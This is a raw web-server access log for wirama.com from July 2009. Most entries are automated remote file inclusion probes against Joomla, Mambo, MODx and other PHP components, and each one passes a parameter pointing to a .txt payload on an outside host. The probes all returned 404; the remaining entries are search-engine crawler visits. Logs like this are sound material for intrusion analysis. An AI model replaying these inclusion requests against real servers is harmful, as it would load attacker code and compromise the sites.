91.121.111.100 - - [31/Jul/2009:03:55:29 -0700] "GET /logs//confirm.php?include_location=http://www.wattenhofer.com/charts//v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.121.111.100 - - [31/Jul/2009:03:55:29 -0700] "GET /confirm.php?include_location=http://www.wattenhofer.com/charts//v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.30.142.97 - - [31/Jul/2009:04:06:08 -0700] "GET /logs/access_090531.log HTTP/1.0" 200 7874616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
89.179.81.33 - - [31/Jul/2009:04:48:13 -0700] "GET /logs/access_090329.log HTTP/1.1" 200 1685256 "http://www.google.ru/search?q=http%3A%2F%2Fzavolgalan.yaroslavl.ru%2Fresponse.txt&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042316 Firefox/3.0" "www.wirama.com"
72.30.142.97 - - [31/Jul/2009:05:01:38 -0700] "GET /logs/access_090331.log HTTP/1.0" 200 82112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.106.183 - - [31/Jul/2009:05:08:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.183 - - [31/Jul/2009:05:09:31 -0700] "GET /logs/?M=A HTTP/1.1" 200 2559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
201.232.54.48 - - [31/Jul/2009:05:38:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [31/Jul/2009:05:38:12 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [31/Jul/2009:05:38:12 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [31/Jul/2009:05:38:25 -0700] "GET /logs/access_090531.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.23.205.32 - - [31/Jul/2009:05:45:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
94.23.205.32 - - [31/Jul/2009:05:45:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
221.194.132.176 - - [31/Jul/2009:05:46:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.wirama.com"
221.194.132.176 - - [31/Jul/2009:05:46:22 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.wirama.com"
221.194.132.176 - - [31/Jul/2009:05:47:03 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.wirama.com"
60.251.217.4 - - [31/Jul/2009:06:07:10 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ostrov-velikanov.com//images/zoom/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.251.217.4 - - [31/Jul/2009:06:07:15 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ostrov-velikanov.com//images/zoom/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.155 - - [31/Jul/2009:06:25:03 -0700] "GET /?M=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
124.0.237.140 - - [31/Jul/2009:06:35:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:35:32 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:35:32 -0700] "GET /logs/access_090531.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:10 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:10 -0700] "GET /logs/access_090531.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:10 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:35 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:35 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:37:35 -0700] "GET /logs/access_090531.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:38:06 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:38:06 -0700] "GET /logs/access_090531.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:38:06 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:39:35 -0700] "GET /logs/access_090531.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:39:49 -0700] "GET /cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:06:39:49 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:06:41:08 -0700] "GET /logs/access.log//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:41:08 -0700] "GET /cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:41:08 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:41:13 -0700] "GET /logs/access_090531.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:41:47 -0700] "GET /logs/access_090531.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.237.140 - - [31/Jul/2009:06:42:02 -0700] "GET /logs/access_090531.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:42:14 -0700] "GET /logs/access.log//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:42:14 -0700] "GET /cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:42:14 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
64.191.102.117 - - [31/Jul/2009:06:46:05 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [31/Jul/2009:06:46:05 -0700] "GET /logs/access_090501.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [31/Jul/2009:06:46:05 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [31/Jul/2009:06:46:05 -0700] "GET /logs/access_090331.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:46:09 -0700] "GET /logs/access_090701.log//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:06:47:00 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:06:47:00 -0700] "GET /cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:06:47:57 -0700] "GET /logs/access_090701.log//cropcanvas.php?cropimagedir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
193.47.80.37 - - [31/Jul/2009:06:58:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
193.47.80.37 - - [31/Jul/2009:06:58:34 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:22:52 -0700] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:22:53 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:22:57 -0700] "GET /logs/access_090401.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:24:11 -0700] "GET /logs/access_090301.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:24:13 -0700] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:24:14 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:36:25 -0700] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:36:25 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
206.176.241.116 - - [31/Jul/2009:07:39:23 -0700] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:07:39:23 -0700] "GET /logs/access_090401.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:07:39:24 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:07:39:56 -0700] "GET /cropcanvas.php?cropimagedir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:07:59:49 -0700] "GET /logs/access.log//cropcanvas.php?cropimagedir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:07:59:49 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
119.245.138.143 - - [31/Jul/2009:08:00:09 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.245.138.143 - - [31/Jul/2009:08:00:09 -0700] "GET /logs/access_090501.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.245.138.143 - - [31/Jul/2009:08:00:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.245.138.143 - - [31/Jul/2009:08:00:18 -0700] "GET /logs/access_090331.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.249.57.201 - - [31/Jul/2009:08:05:11 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/v2-id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
212.249.57.201 - - [31/Jul/2009:08:05:12 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/v2-id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
72.30.142.97 - - [31/Jul/2009:08:07:12 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
119.245.138.143 - - [31/Jul/2009:08:13:14 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.245.138.143 - - [31/Jul/2009:08:13:14 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.245.138.143 - - [31/Jul/2009:08:13:15 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.245.138.143 - - [31/Jul/2009:08:13:21 -0700] "GET /logs/access_090330.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.96 - - [31/Jul/2009:08:25:07 -0700] "GET /logs/access_090401.log/errors.php?error=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.96 - - [31/Jul/2009:08:25:07 -0700] "GET /logs/errors.php?error=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.96 - - [31/Jul/2009:08:25:07 -0700] "GET /errors.php?error=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:08:36:59 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:08:36:59 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:08:37:10 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:08:37:10 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
206.176.241.116 - - [31/Jul/2009:08:41:51 -0700] "GET /logs/access_090701.log//cropcanvas.php?cropimagedir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
210.205.6.233 - - [31/Jul/2009:08:48:05 -0700] "GET /logs//components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [31/Jul/2009:08:48:05 -0700] "GET /logs/access_090331.log//components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [31/Jul/2009:08:48:05 -0700] "GET /components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:08:51:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:08:51:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
65.55.106.183 - - [31/Jul/2009:08:52:55 -0700] "GET /?D=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
210.205.6.233 - - [31/Jul/2009:08:56:45 -0700] "GET /components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [31/Jul/2009:08:56:45 -0700] "GET /logs//components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [31/Jul/2009:08:56:45 -0700] "GET /logs/access_090331.log//components/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:09:02:03 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:02:06 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:12:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:12:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
208.80.195.42 - - [31/Jul/2009:09:17:32 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; Media Center PC 2.8; InfoPath.2)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:23:00 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:23:00 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.wirama.com"
211.238.14.146 - - [31/Jul/2009:09:26:58 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.238.14.146 - - [31/Jul/2009:09:26:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
213.195.69.64 - - [31/Jul/2009:09:31:29 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/testv??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "wirama.com"
213.195.69.64 - - [31/Jul/2009:09:31:30 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/testv??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "wirama.com"
203.236.100.30 - - [31/Jul/2009:09:31:39 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.236.100.30 - - [31/Jul/2009:09:31:40 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.236.100.30 - - [31/Jul/2009:09:31:40 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:09:33:14 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:33:14 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
213.195.69.64 - - [31/Jul/2009:09:34:49 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/testv??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
